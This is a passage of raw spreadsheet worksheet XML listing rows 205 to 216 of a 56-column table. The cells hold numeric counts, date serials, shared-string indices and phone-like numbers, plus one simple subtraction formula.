        <v>2012</v>
      </c>
      <c r="AP205" t="s">
        <v>1773</v>
      </c>
      <c r="AQ205" t="s">
        <v>1774</v>
      </c>
      <c r="AR205" t="s">
        <v>1770</v>
      </c>
      <c r="AU205">
        <v>31</v>
      </c>
      <c r="AV205">
        <v>1</v>
      </c>
      <c r="AW205">
        <v>45</v>
      </c>
      <c r="AX205">
        <v>15</v>
      </c>
      <c r="AY205">
        <v>4</v>
      </c>
      <c r="AZ205">
        <v>6</v>
      </c>
      <c r="BA205" t="s">
        <v>16699</v>
      </c>
      <c r="BB205" t="s">
        <v>14592</v>
      </c>
      <c r="BC205" t="s">
        <v>9550</v>
      </c>
      <c r="BD205" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="206" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A206">
        <v>701</v>
      </c>
      <c r="B206" t="s">
        <v>1775</v>
      </c>
      <c r="C206" t="s">
        <v>129</v>
      </c>
      <c r="D206" t="s">
        <v>1776</v>
      </c>
      <c r="E206" t="s">
        <v>644</v>
      </c>
      <c r="F206" t="s">
        <v>1777</v>
      </c>
      <c r="G206" s="1">
        <v>44210</v>
      </c>
      <c r="H206">
        <v>5224</v>
      </c>
      <c r="I206">
        <v>5224</v>
      </c>
      <c r="J206">
        <v>0</v>
      </c>
      <c r="K206">
        <v>0</v>
      </c>
      <c r="L206">
        <v>0</v>
      </c>
      <c r="M206">
        <v>0</v>
      </c>
      <c r="N206">
        <v>0</v>
      </c>
      <c r="O206">
        <v>0</v>
      </c>
      <c r="P206">
        <v>0</v>
      </c>
      <c r="Q206">
        <v>2</v>
      </c>
      <c r="R206">
        <v>1</v>
      </c>
      <c r="S206">
        <v>0</v>
      </c>
      <c r="T206">
        <v>2</v>
      </c>
      <c r="U206">
        <v>0</v>
      </c>
      <c r="V206">
        <v>0</v>
      </c>
      <c r="W206">
        <v>0</v>
      </c>
      <c r="X206">
        <v>0</v>
      </c>
      <c r="Y206">
        <v>0</v>
      </c>
      <c r="Z206">
        <v>0</v>
      </c>
      <c r="AA206">
        <v>0</v>
      </c>
      <c r="AB206">
        <v>2000</v>
      </c>
      <c r="AC206">
        <v>1000</v>
      </c>
      <c r="AD206">
        <v>0</v>
      </c>
      <c r="AE206">
        <v>50</v>
      </c>
      <c r="AF206" t="s">
        <v>1778</v>
      </c>
      <c r="AG206">
        <v>15125</v>
      </c>
      <c r="AH206">
        <v>11</v>
      </c>
      <c r="AJ206">
        <v>270</v>
      </c>
      <c r="AK206" t="s">
        <v>1048</v>
      </c>
      <c r="AL206" t="s">
        <v>1048</v>
      </c>
      <c r="AM206" t="s">
        <v>1779</v>
      </c>
      <c r="AN206" t="s">
        <v>68</v>
      </c>
      <c r="AO206">
        <v>2017</v>
      </c>
      <c r="AP206">
        <v>87771465466</v>
      </c>
      <c r="AQ206" t="s">
        <v>1780</v>
      </c>
      <c r="AR206" t="s">
        <v>1781</v>
      </c>
      <c r="AS206" t="s">
        <v>57</v>
      </c>
      <c r="AT206" t="s">
        <v>58</v>
      </c>
      <c r="AU206">
        <v>22</v>
      </c>
      <c r="AV206">
        <v>1</v>
      </c>
      <c r="AW206">
        <v>0</v>
      </c>
      <c r="AX206">
        <v>0</v>
      </c>
      <c r="AY206">
        <v>2</v>
      </c>
      <c r="AZ206">
        <v>4</v>
      </c>
      <c r="BA206" t="s">
        <v>17461</v>
      </c>
      <c r="BB206" t="s">
        <v>14787</v>
      </c>
      <c r="BC206">
        <v>0</v>
      </c>
      <c r="BD206" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="207" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A207">
        <v>577</v>
      </c>
      <c r="B207" t="s">
        <v>1782</v>
      </c>
      <c r="C207" t="s">
        <v>872</v>
      </c>
      <c r="D207" t="s">
        <v>1783</v>
      </c>
      <c r="E207" t="s">
        <v>111</v>
      </c>
      <c r="F207" t="s">
        <v>1784</v>
      </c>
      <c r="G207" s="1">
        <v>44167</v>
      </c>
      <c r="H207">
        <v>5254</v>
      </c>
      <c r="I207">
        <v>5254</v>
      </c>
      <c r="J207">
        <v>2</v>
      </c>
      <c r="K207">
        <v>0</v>
      </c>
      <c r="L207">
        <v>3</v>
      </c>
      <c r="M207">
        <v>0</v>
      </c>
      <c r="N207">
        <v>0</v>
      </c>
      <c r="O207">
        <v>0</v>
      </c>
      <c r="P207">
        <v>0</v>
      </c>
      <c r="Q207">
        <v>4</v>
      </c>
      <c r="R207">
        <v>6</v>
      </c>
      <c r="S207">
        <v>0</v>
      </c>
      <c r="T207">
        <v>2</v>
      </c>
      <c r="U207">
        <v>100000</v>
      </c>
      <c r="V207">
        <v>0</v>
      </c>
      <c r="W207">
        <v>10000</v>
      </c>
      <c r="X207">
        <v>0</v>
      </c>
      <c r="Y207">
        <v>0</v>
      </c>
      <c r="Z207">
        <v>0</v>
      </c>
      <c r="AA207">
        <v>0</v>
      </c>
      <c r="AB207">
        <v>1000</v>
      </c>
      <c r="AC207">
        <v>5000</v>
      </c>
      <c r="AD207">
        <v>0</v>
      </c>
      <c r="AE207">
        <v>30000</v>
      </c>
      <c r="AF207" t="s">
        <v>1785</v>
      </c>
      <c r="AG207">
        <v>94711</v>
      </c>
      <c r="AH207">
        <v>28</v>
      </c>
      <c r="AJ207">
        <v>387</v>
      </c>
      <c r="AK207" t="s">
        <v>876</v>
      </c>
      <c r="AL207" t="s">
        <v>1786</v>
      </c>
      <c r="AM207" t="s">
        <v>1787</v>
      </c>
      <c r="AN207" t="s">
        <v>55</v>
      </c>
      <c r="AO207">
        <v>2000</v>
      </c>
      <c r="AP207">
        <v>81332181890</v>
      </c>
      <c r="AQ207" t="s">
        <v>1788</v>
      </c>
      <c r="AR207" t="s">
        <v>1789</v>
      </c>
      <c r="AS207" t="s">
        <v>71</v>
      </c>
      <c r="AT207" t="s">
        <v>58</v>
      </c>
      <c r="AU207">
        <v>15</v>
      </c>
      <c r="AV207">
        <v>0</v>
      </c>
      <c r="AW207">
        <v>3</v>
      </c>
      <c r="AX207">
        <v>5</v>
      </c>
      <c r="AY207">
        <v>1</v>
      </c>
      <c r="AZ207">
        <v>2</v>
      </c>
      <c r="BA207" t="s">
        <v>17385</v>
      </c>
      <c r="BB207" t="s">
        <v>14689</v>
      </c>
      <c r="BC207" t="s">
        <v>9536</v>
      </c>
      <c r="BD207" t="s">
        <v>11655</v>
      </c>
    </row>
    <row r="208" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A208">
        <v>721</v>
      </c>
      <c r="B208" t="s">
        <v>1790</v>
      </c>
      <c r="C208" t="s">
        <v>60</v>
      </c>
      <c r="D208" t="s">
        <v>1791</v>
      </c>
      <c r="E208" t="s">
        <v>142</v>
      </c>
      <c r="F208" t="s">
        <v>562</v>
      </c>
      <c r="G208" s="1">
        <v>44075</v>
      </c>
      <c r="H208">
        <v>5300</v>
      </c>
      <c r="I208">
        <v>5300</v>
      </c>
      <c r="J208">
        <v>2</v>
      </c>
      <c r="K208">
        <v>0</v>
      </c>
      <c r="L208">
        <v>0</v>
      </c>
      <c r="M208">
        <v>5</v>
      </c>
      <c r="N208">
        <v>0</v>
      </c>
      <c r="O208">
        <v>0</v>
      </c>
      <c r="P208">
        <v>0</v>
      </c>
      <c r="Q208">
        <v>14</v>
      </c>
      <c r="R208">
        <v>0</v>
      </c>
      <c r="S208">
        <v>1</v>
      </c>
      <c r="T208">
        <v>2</v>
      </c>
      <c r="U208">
        <v>310</v>
      </c>
      <c r="V208">
        <v>0</v>
      </c>
      <c r="W208">
        <v>0</v>
      </c>
      <c r="X208">
        <v>11</v>
      </c>
      <c r="Y208">
        <v>0</v>
      </c>
      <c r="Z208">
        <v>0</v>
      </c>
      <c r="AA208">
        <v>0</v>
      </c>
      <c r="AB208">
        <v>10</v>
      </c>
      <c r="AC208">
        <v>0</v>
      </c>
      <c r="AD208">
        <v>1</v>
      </c>
      <c r="AE208">
        <v>952450</v>
      </c>
      <c r="AF208" t="s">
        <v>1792</v>
      </c>
      <c r="AG208">
        <v>0</v>
      </c>
      <c r="AH208">
        <v>10</v>
      </c>
      <c r="AJ208">
        <v>133</v>
      </c>
      <c r="AK208" t="s">
        <v>1793</v>
      </c>
      <c r="AL208" t="s">
        <v>1794</v>
      </c>
      <c r="AM208" t="s">
        <v>1795</v>
      </c>
      <c r="AN208" t="s">
        <v>82</v>
      </c>
      <c r="AO208">
        <v>2006</v>
      </c>
      <c r="AP208" t="s">
        <v>351</v>
      </c>
      <c r="AQ208" t="s">
        <v>1796</v>
      </c>
      <c r="AR208" t="s">
        <v>1797</v>
      </c>
      <c r="AS208" t="s">
        <v>71</v>
      </c>
      <c r="AT208" t="s">
        <v>86</v>
      </c>
      <c r="AU208">
        <v>25</v>
      </c>
      <c r="AV208">
        <v>1</v>
      </c>
      <c r="AW208">
        <v>578</v>
      </c>
      <c r="AX208">
        <v>1250</v>
      </c>
      <c r="AY208">
        <v>103</v>
      </c>
      <c r="AZ208">
        <v>20</v>
      </c>
      <c r="BA208" t="s">
        <v>16826</v>
      </c>
      <c r="BB208" t="s">
        <v>14802</v>
      </c>
      <c r="BC208">
        <v>0</v>
      </c>
      <c r="BD208" t="s">
        <v>11610</v>
      </c>
    </row>
    <row r="209" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A209">
        <v>631</v>
      </c>
      <c r="B209" t="s">
        <v>1798</v>
      </c>
      <c r="C209" t="s">
        <v>74</v>
      </c>
      <c r="D209" t="s">
        <v>1799</v>
      </c>
      <c r="E209" t="s">
        <v>1196</v>
      </c>
      <c r="F209" t="s">
        <v>1800</v>
      </c>
      <c r="G209" s="1">
        <v>44130</v>
      </c>
      <c r="H209">
        <v>5325</v>
      </c>
      <c r="I209">
        <v>5325</v>
      </c>
      <c r="J209">
        <v>0</v>
      </c>
      <c r="K209">
        <v>0</v>
      </c>
      <c r="L209">
        <v>0</v>
      </c>
      <c r="M209">
        <v>0</v>
      </c>
      <c r="N209">
        <v>0</v>
      </c>
      <c r="O209">
        <v>0</v>
      </c>
      <c r="P209">
        <v>0</v>
      </c>
      <c r="Q209">
        <v>0</v>
      </c>
      <c r="R209">
        <v>0</v>
      </c>
      <c r="S209">
        <v>0</v>
      </c>
      <c r="T209">
        <v>3</v>
      </c>
      <c r="U209">
        <v>0</v>
      </c>
      <c r="V209">
        <v>0</v>
      </c>
      <c r="W209">
        <v>0</v>
      </c>
      <c r="X209">
        <v>0</v>
      </c>
      <c r="Y209">
        <v>0</v>
      </c>
      <c r="Z209">
        <v>0</v>
      </c>
      <c r="AA209">
        <v>0</v>
      </c>
      <c r="AB209">
        <v>0</v>
      </c>
      <c r="AC209">
        <v>0</v>
      </c>
      <c r="AD209">
        <v>0</v>
      </c>
      <c r="AE209">
        <v>300</v>
      </c>
      <c r="AF209" t="s">
        <v>1801</v>
      </c>
      <c r="AG209">
        <v>51381</v>
      </c>
      <c r="AH209">
        <v>14</v>
      </c>
      <c r="AJ209">
        <v>211</v>
      </c>
      <c r="AK209" t="s">
        <v>1802</v>
      </c>
      <c r="AL209" t="s">
        <v>1803</v>
      </c>
      <c r="AM209" t="s">
        <v>1804</v>
      </c>
      <c r="AN209" t="s">
        <v>68</v>
      </c>
      <c r="AO209">
        <v>1998</v>
      </c>
      <c r="AP209">
        <v>8122913797</v>
      </c>
      <c r="AQ209" t="s">
        <v>1805</v>
      </c>
      <c r="AR209" t="s">
        <v>1801</v>
      </c>
      <c r="AS209" t="s">
        <v>71</v>
      </c>
      <c r="AT209" t="s">
        <v>72</v>
      </c>
      <c r="AU209">
        <v>0</v>
      </c>
      <c r="AV209">
        <v>0</v>
      </c>
      <c r="AW209">
        <v>2</v>
      </c>
      <c r="AX209">
        <v>3</v>
      </c>
      <c r="AY209">
        <v>2</v>
      </c>
      <c r="AZ209">
        <v>3</v>
      </c>
      <c r="BA209" t="s">
        <v>17470</v>
      </c>
      <c r="BB209" t="s">
        <v>14735</v>
      </c>
      <c r="BC209">
        <v>0</v>
      </c>
      <c r="BD209" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="210" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A210">
        <v>20</v>
      </c>
      <c r="B210" t="s">
        <v>1806</v>
      </c>
      <c r="C210" t="s">
        <v>1672</v>
      </c>
      <c r="D210" t="s">
        <v>1807</v>
      </c>
      <c r="E210" t="s">
        <v>142</v>
      </c>
      <c r="F210" t="s">
        <v>1420</v>
      </c>
      <c r="G210" s="1">
        <v>44351</v>
      </c>
      <c r="H210">
        <v>5369</v>
      </c>
      <c r="I210">
        <v>5369</v>
      </c>
      <c r="J210">
        <v>3</v>
      </c>
      <c r="K210">
        <v>1</v>
      </c>
      <c r="L210">
        <v>3</v>
      </c>
      <c r="M210">
        <v>3</v>
      </c>
      <c r="N210">
        <v>0</v>
      </c>
      <c r="O210">
        <v>0</v>
      </c>
      <c r="P210">
        <v>0</v>
      </c>
      <c r="Q210">
        <v>4</v>
      </c>
      <c r="R210">
        <v>40</v>
      </c>
      <c r="S210">
        <v>0</v>
      </c>
      <c r="T210">
        <v>0</v>
      </c>
      <c r="U210">
        <v>15000</v>
      </c>
      <c r="V210">
        <v>10000</v>
      </c>
      <c r="W210">
        <v>9000</v>
      </c>
      <c r="X210">
        <v>1500</v>
      </c>
      <c r="Y210">
        <v>0</v>
      </c>
      <c r="Z210">
        <v>0</v>
      </c>
      <c r="AA210">
        <v>0</v>
      </c>
      <c r="AB210">
        <v>250</v>
      </c>
      <c r="AC210">
        <v>6000</v>
      </c>
      <c r="AD210">
        <v>0</v>
      </c>
      <c r="AE210">
        <v>0</v>
      </c>
      <c r="AF210" t="s">
        <v>1808</v>
      </c>
      <c r="AG210">
        <v>70852</v>
      </c>
      <c r="AH210">
        <v>22</v>
      </c>
      <c r="AJ210">
        <v>343</v>
      </c>
      <c r="AK210" t="s">
        <v>1809</v>
      </c>
      <c r="AL210" t="s">
        <v>1810</v>
      </c>
      <c r="AM210" t="s">
        <v>1811</v>
      </c>
      <c r="AN210" t="s">
        <v>55</v>
      </c>
      <c r="AO210">
        <v>1991</v>
      </c>
      <c r="AP210">
        <v>82155701070</v>
      </c>
      <c r="AQ210" t="s">
        <v>1812</v>
      </c>
      <c r="AR210" t="s">
        <v>1808</v>
      </c>
      <c r="AS210" t="s">
        <v>71</v>
      </c>
      <c r="AT210" t="s">
        <v>58</v>
      </c>
      <c r="AU210">
        <v>25</v>
      </c>
      <c r="AV210">
        <v>1</v>
      </c>
      <c r="AW210">
        <v>8</v>
      </c>
      <c r="AX210">
        <v>3</v>
      </c>
      <c r="AY210">
        <v>6</v>
      </c>
      <c r="AZ210">
        <v>8</v>
      </c>
      <c r="BA210" t="s">
        <v>17473</v>
      </c>
      <c r="BB210" t="s">
        <v>14224</v>
      </c>
      <c r="BC210" t="s">
        <v>9755</v>
      </c>
      <c r="BD210">
        <v>0</v>
      </c>
    </row>
    <row r="211" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A211">
        <v>519</v>
      </c>
      <c r="B211" t="s">
        <v>1813</v>
      </c>
      <c r="C211" t="s">
        <v>157</v>
      </c>
      <c r="D211" t="s">
        <v>1814</v>
      </c>
      <c r="E211" t="s">
        <v>142</v>
      </c>
      <c r="F211" t="s">
        <v>1815</v>
      </c>
      <c r="G211" s="1">
        <v>44103</v>
      </c>
      <c r="H211">
        <v>5462</v>
      </c>
      <c r="I211">
        <v>5462</v>
      </c>
      <c r="J211">
        <v>1</v>
      </c>
      <c r="K211">
        <v>0</v>
      </c>
      <c r="L211">
        <v>0</v>
      </c>
      <c r="M211">
        <v>0</v>
      </c>
      <c r="N211">
        <v>0</v>
      </c>
      <c r="O211">
        <v>0</v>
      </c>
      <c r="P211">
        <v>0</v>
      </c>
      <c r="Q211">
        <v>0</v>
      </c>
      <c r="R211">
        <v>0</v>
      </c>
      <c r="S211">
        <v>0</v>
      </c>
      <c r="T211">
        <v>0</v>
      </c>
      <c r="U211">
        <v>100000</v>
      </c>
      <c r="V211">
        <v>0</v>
      </c>
      <c r="W211">
        <v>0</v>
      </c>
      <c r="X211">
        <v>0</v>
      </c>
      <c r="Y211">
        <v>0</v>
      </c>
      <c r="Z211">
        <v>0</v>
      </c>
      <c r="AA211">
        <v>0</v>
      </c>
      <c r="AB211">
        <v>0</v>
      </c>
      <c r="AC211">
        <v>0</v>
      </c>
      <c r="AD211">
        <v>0</v>
      </c>
      <c r="AE211">
        <v>0</v>
      </c>
      <c r="AF211" t="s">
        <v>1816</v>
      </c>
      <c r="AG211">
        <v>61121</v>
      </c>
      <c r="AH211">
        <v>16</v>
      </c>
      <c r="AJ211">
        <v>252</v>
      </c>
      <c r="AK211" t="s">
        <v>387</v>
      </c>
      <c r="AL211" t="s">
        <v>388</v>
      </c>
      <c r="AM211" t="s">
        <v>1817</v>
      </c>
      <c r="AN211" t="s">
        <v>55</v>
      </c>
      <c r="AO211">
        <v>2013</v>
      </c>
      <c r="AP211" t="s">
        <v>1818</v>
      </c>
      <c r="AQ211" t="s">
        <v>1819</v>
      </c>
      <c r="AR211" t="s">
        <v>1820</v>
      </c>
      <c r="AS211" t="s">
        <v>187</v>
      </c>
      <c r="AT211" t="s">
        <v>58</v>
      </c>
      <c r="AU211">
        <v>25</v>
      </c>
      <c r="AV211">
        <v>1</v>
      </c>
      <c r="AW211">
        <v>6</v>
      </c>
      <c r="AX211">
        <v>7</v>
      </c>
      <c r="AY211">
        <v>7</v>
      </c>
      <c r="AZ211">
        <v>0</v>
      </c>
      <c r="BA211" t="s">
        <v>16709</v>
      </c>
      <c r="BB211" t="s">
        <v>14637</v>
      </c>
      <c r="BC211" t="s">
        <v>11680</v>
      </c>
      <c r="BD211">
        <v>0</v>
      </c>
    </row>
    <row r="212" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A212">
        <v>563</v>
      </c>
      <c r="B212" t="s">
        <v>1821</v>
      </c>
      <c r="C212" t="s">
        <v>607</v>
      </c>
      <c r="D212" t="s">
        <v>1822</v>
      </c>
      <c r="E212" t="s">
        <v>76</v>
      </c>
      <c r="F212" t="s">
        <v>1823</v>
      </c>
      <c r="G212" s="1">
        <v>43837</v>
      </c>
      <c r="H212">
        <v>5473</v>
      </c>
      <c r="I212">
        <v>5473</v>
      </c>
      <c r="J212">
        <v>9</v>
      </c>
      <c r="K212">
        <v>2</v>
      </c>
      <c r="L212">
        <v>0</v>
      </c>
      <c r="M212">
        <v>3</v>
      </c>
      <c r="N212">
        <v>0</v>
      </c>
      <c r="O212">
        <v>0</v>
      </c>
      <c r="P212">
        <v>0</v>
      </c>
      <c r="Q212">
        <v>1</v>
      </c>
      <c r="R212">
        <v>110</v>
      </c>
      <c r="S212">
        <v>1</v>
      </c>
      <c r="T212">
        <v>0</v>
      </c>
      <c r="U212">
        <v>400000</v>
      </c>
      <c r="V212">
        <v>2000</v>
      </c>
      <c r="W212">
        <v>0</v>
      </c>
      <c r="X212">
        <v>667</v>
      </c>
      <c r="Y212">
        <v>0</v>
      </c>
      <c r="Z212">
        <v>0</v>
      </c>
      <c r="AA212">
        <v>0</v>
      </c>
      <c r="AB212">
        <v>200</v>
      </c>
      <c r="AC212">
        <v>55000</v>
      </c>
      <c r="AD212">
        <v>1</v>
      </c>
      <c r="AE212">
        <v>0</v>
      </c>
      <c r="AF212" t="s">
        <v>1747</v>
      </c>
      <c r="AG212">
        <v>77111</v>
      </c>
      <c r="AH212">
        <v>24</v>
      </c>
      <c r="AJ212">
        <v>370</v>
      </c>
      <c r="AK212" t="s">
        <v>1824</v>
      </c>
      <c r="AL212" t="s">
        <v>1825</v>
      </c>
      <c r="AM212" t="s">
        <v>1826</v>
      </c>
      <c r="AN212" t="s">
        <v>55</v>
      </c>
      <c r="AO212">
        <v>1998</v>
      </c>
      <c r="AP212" t="s">
        <v>1827</v>
      </c>
      <c r="AQ212">
        <v>81257788660</v>
      </c>
      <c r="AR212" t="s">
        <v>1747</v>
      </c>
      <c r="AS212" t="s">
        <v>71</v>
      </c>
      <c r="AT212" t="s">
        <v>58</v>
      </c>
      <c r="AU212">
        <v>26</v>
      </c>
      <c r="AV212">
        <v>2</v>
      </c>
      <c r="AW212">
        <v>25</v>
      </c>
      <c r="AX212">
        <v>25</v>
      </c>
      <c r="AY212">
        <v>44</v>
      </c>
      <c r="AZ212">
        <v>52</v>
      </c>
      <c r="BA212" t="s">
        <v>16719</v>
      </c>
      <c r="BB212" t="s">
        <v>14676</v>
      </c>
      <c r="BC212">
        <v>0</v>
      </c>
      <c r="BD212">
        <v>0</v>
      </c>
    </row>
    <row r="213" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A213">
        <v>174</v>
      </c>
      <c r="B213" t="s">
        <v>1828</v>
      </c>
      <c r="C213" t="s">
        <v>168</v>
      </c>
      <c r="D213" t="s">
        <v>1829</v>
      </c>
      <c r="E213" t="s">
        <v>76</v>
      </c>
      <c r="F213" t="s">
        <v>1830</v>
      </c>
      <c r="G213" s="1">
        <v>44106</v>
      </c>
      <c r="H213">
        <v>5550</v>
      </c>
      <c r="I213">
        <v>5550</v>
      </c>
      <c r="J213">
        <v>1</v>
      </c>
      <c r="K213">
        <v>1</v>
      </c>
      <c r="L213">
        <v>0</v>
      </c>
      <c r="M213">
        <v>3</v>
      </c>
      <c r="N213">
        <v>0</v>
      </c>
      <c r="O213">
        <v>0</v>
      </c>
      <c r="P213">
        <v>1</v>
      </c>
      <c r="Q213">
        <v>0</v>
      </c>
      <c r="R213">
        <v>0</v>
      </c>
      <c r="S213">
        <v>0</v>
      </c>
      <c r="T213">
        <v>0</v>
      </c>
      <c r="U213">
        <v>100000</v>
      </c>
      <c r="V213">
        <v>20000</v>
      </c>
      <c r="W213">
        <v>0</v>
      </c>
      <c r="X213">
        <v>24000</v>
      </c>
      <c r="Y213">
        <v>0</v>
      </c>
      <c r="Z213">
        <v>0</v>
      </c>
      <c r="AA213">
        <v>0</v>
      </c>
      <c r="AB213">
        <v>0</v>
      </c>
      <c r="AC213">
        <v>0</v>
      </c>
      <c r="AD213">
        <v>0</v>
      </c>
      <c r="AE213">
        <v>0</v>
      </c>
      <c r="AF213" t="s">
        <v>1831</v>
      </c>
      <c r="AG213">
        <v>16820</v>
      </c>
      <c r="AH213">
        <v>13</v>
      </c>
      <c r="AJ213">
        <v>161</v>
      </c>
      <c r="AK213" t="s">
        <v>1832</v>
      </c>
      <c r="AL213" t="s">
        <v>1833</v>
      </c>
      <c r="AM213" t="s">
        <v>1834</v>
      </c>
      <c r="AN213" t="s">
        <v>55</v>
      </c>
      <c r="AO213">
        <v>2009</v>
      </c>
      <c r="AP213" t="s">
        <v>1835</v>
      </c>
      <c r="AQ213" t="s">
        <v>1836</v>
      </c>
      <c r="AR213" t="s">
        <v>1837</v>
      </c>
      <c r="AS213" t="s">
        <v>71</v>
      </c>
      <c r="AT213" t="s">
        <v>58</v>
      </c>
      <c r="AU213">
        <v>6</v>
      </c>
      <c r="AV213">
        <v>1</v>
      </c>
      <c r="AW213">
        <v>19</v>
      </c>
      <c r="AX213">
        <v>30</v>
      </c>
      <c r="AY213">
        <v>10</v>
      </c>
      <c r="AZ213">
        <v>22</v>
      </c>
      <c r="BA213" t="s">
        <v>17481</v>
      </c>
      <c r="BB213" t="s">
        <v>14358</v>
      </c>
      <c r="BC213">
        <v>0</v>
      </c>
      <c r="BD213" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="214" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A214">
        <v>491</v>
      </c>
      <c r="B214" t="s">
        <v>1838</v>
      </c>
      <c r="C214" t="s">
        <v>129</v>
      </c>
      <c r="D214" t="s">
        <v>1839</v>
      </c>
      <c r="E214" t="s">
        <v>142</v>
      </c>
      <c r="F214" t="s">
        <v>537</v>
      </c>
      <c r="G214" s="1">
        <v>44176</v>
      </c>
      <c r="H214">
        <v>5598</v>
      </c>
      <c r="I214">
        <v>5598</v>
      </c>
      <c r="J214">
        <v>2</v>
      </c>
      <c r="K214">
        <v>0</v>
      </c>
      <c r="L214">
        <v>0</v>
      </c>
      <c r="M214">
        <v>2</v>
      </c>
      <c r="N214">
        <v>1000</v>
      </c>
      <c r="O214">
        <v>0</v>
      </c>
      <c r="P214">
        <v>0</v>
      </c>
      <c r="Q214">
        <v>2</v>
      </c>
      <c r="R214">
        <v>60</v>
      </c>
      <c r="S214">
        <v>0</v>
      </c>
      <c r="T214">
        <v>0</v>
      </c>
      <c r="U214">
        <v>100000</v>
      </c>
      <c r="V214">
        <v>0</v>
      </c>
      <c r="W214">
        <v>0</v>
      </c>
      <c r="X214">
        <v>1500</v>
      </c>
      <c r="Y214">
        <v>0</v>
      </c>
      <c r="Z214">
        <v>0</v>
      </c>
      <c r="AA214">
        <v>0</v>
      </c>
      <c r="AB214">
        <v>3000</v>
      </c>
      <c r="AC214">
        <v>18000</v>
      </c>
      <c r="AD214">
        <v>0</v>
      </c>
      <c r="AE214">
        <v>0</v>
      </c>
      <c r="AF214" t="s">
        <v>1840</v>
      </c>
      <c r="AG214">
        <v>15610</v>
      </c>
      <c r="AH214">
        <v>11</v>
      </c>
      <c r="AJ214">
        <v>268</v>
      </c>
      <c r="AK214" t="s">
        <v>1841</v>
      </c>
      <c r="AL214" t="s">
        <v>1842</v>
      </c>
      <c r="AM214" t="s">
        <v>1843</v>
      </c>
      <c r="AN214" t="s">
        <v>55</v>
      </c>
      <c r="AO214">
        <v>2016</v>
      </c>
      <c r="AP214" t="s">
        <v>1844</v>
      </c>
      <c r="AQ214">
        <f>6221 - 6907792</f>
        <v>-6901571</v>
      </c>
      <c r="AR214" t="s">
        <v>1845</v>
      </c>
      <c r="AS214" t="s">
        <v>71</v>
      </c>
      <c r="AT214" t="s">
        <v>58</v>
      </c>
      <c r="AU214">
        <v>25</v>
      </c>
      <c r="AV214">
        <v>1</v>
      </c>
      <c r="AW214">
        <v>89</v>
      </c>
      <c r="AX214">
        <v>744</v>
      </c>
      <c r="AY214">
        <v>7</v>
      </c>
      <c r="AZ214">
        <v>8</v>
      </c>
      <c r="BA214" t="s">
        <v>16584</v>
      </c>
      <c r="BB214" t="s">
        <v>14205</v>
      </c>
      <c r="BC214">
        <v>0</v>
      </c>
      <c r="BD214" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="215" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A215">
        <v>658</v>
      </c>
      <c r="B215" t="s">
        <v>1846</v>
      </c>
      <c r="C215" t="s">
        <v>607</v>
      </c>
      <c r="D215" t="s">
        <v>1847</v>
      </c>
      <c r="E215" t="s">
        <v>142</v>
      </c>
      <c r="F215" t="s">
        <v>1848</v>
      </c>
      <c r="G215" s="1">
        <v>44319</v>
      </c>
      <c r="H215">
        <v>5658</v>
      </c>
      <c r="I215">
        <v>5658</v>
      </c>
      <c r="J215">
        <v>0</v>
      </c>
      <c r="K215">
        <v>1</v>
      </c>
      <c r="L215">
        <v>4</v>
      </c>
      <c r="M215">
        <v>0</v>
      </c>
      <c r="N215">
        <v>0</v>
      </c>
      <c r="O215">
        <v>0</v>
      </c>
      <c r="P215">
        <v>0</v>
      </c>
      <c r="Q215">
        <v>4</v>
      </c>
      <c r="R215">
        <v>10</v>
      </c>
      <c r="S215">
        <v>0</v>
      </c>
      <c r="T215">
        <v>1</v>
      </c>
      <c r="U215">
        <v>0</v>
      </c>
      <c r="V215">
        <v>150000</v>
      </c>
      <c r="W215">
        <v>20</v>
      </c>
      <c r="X215">
        <v>0</v>
      </c>
      <c r="Y215">
        <v>0</v>
      </c>
      <c r="Z215">
        <v>0</v>
      </c>
      <c r="AA215">
        <v>0</v>
      </c>
      <c r="AB215">
        <v>500</v>
      </c>
      <c r="AC215">
        <v>5000</v>
      </c>
      <c r="AD215">
        <v>0</v>
      </c>
      <c r="AE215">
        <v>25000</v>
      </c>
      <c r="AF215" t="s">
        <v>1849</v>
      </c>
      <c r="AG215">
        <v>77111</v>
      </c>
      <c r="AH215">
        <v>24</v>
      </c>
      <c r="AJ215">
        <v>370</v>
      </c>
      <c r="AK215" t="s">
        <v>1824</v>
      </c>
      <c r="AL215" t="s">
        <v>1825</v>
      </c>
      <c r="AM215" t="s">
        <v>1850</v>
      </c>
      <c r="AN215" t="s">
        <v>55</v>
      </c>
      <c r="AO215">
        <v>2000</v>
      </c>
      <c r="AP215" t="s">
        <v>1851</v>
      </c>
      <c r="AQ215">
        <v>85337171888</v>
      </c>
      <c r="AR215" t="s">
        <v>1849</v>
      </c>
      <c r="AS215" t="s">
        <v>71</v>
      </c>
      <c r="AT215" t="s">
        <v>58</v>
      </c>
      <c r="AU215">
        <v>0</v>
      </c>
      <c r="AV215">
        <v>0</v>
      </c>
      <c r="AW215">
        <v>20</v>
      </c>
      <c r="AX215">
        <v>11</v>
      </c>
      <c r="AY215">
        <v>8</v>
      </c>
      <c r="AZ215">
        <v>14</v>
      </c>
      <c r="BA215" t="s">
        <v>16732</v>
      </c>
      <c r="BB215" t="s">
        <v>14755</v>
      </c>
      <c r="BC215" t="s">
        <v>12285</v>
      </c>
      <c r="BD215" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="216" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A216">
        <v>195</v>
      </c>
      <c r="B216" t="s">
        <v>1852</v>
      </c>
      <c r="C216" t="s">
        <v>99</v>
      </c>
      <c r="D216" t="s">
        <v>1853</v>
      </c>
      <c r="E216" t="s">
        <v>76</v>
      </c>
      <c r="F216" t="s">
        <v>1854</v>
      </c>
      <c r="G216" s="1">
        <v>44260</v>
      </c>
      <c r="H216">
        <v>5728</v>
      </c>
      <c r="I216">
        <v>5728</v>
      </c>
      <c r="J216">
        <v>0</v>
      </c>
      <c r="K216">
        <v>1</v>
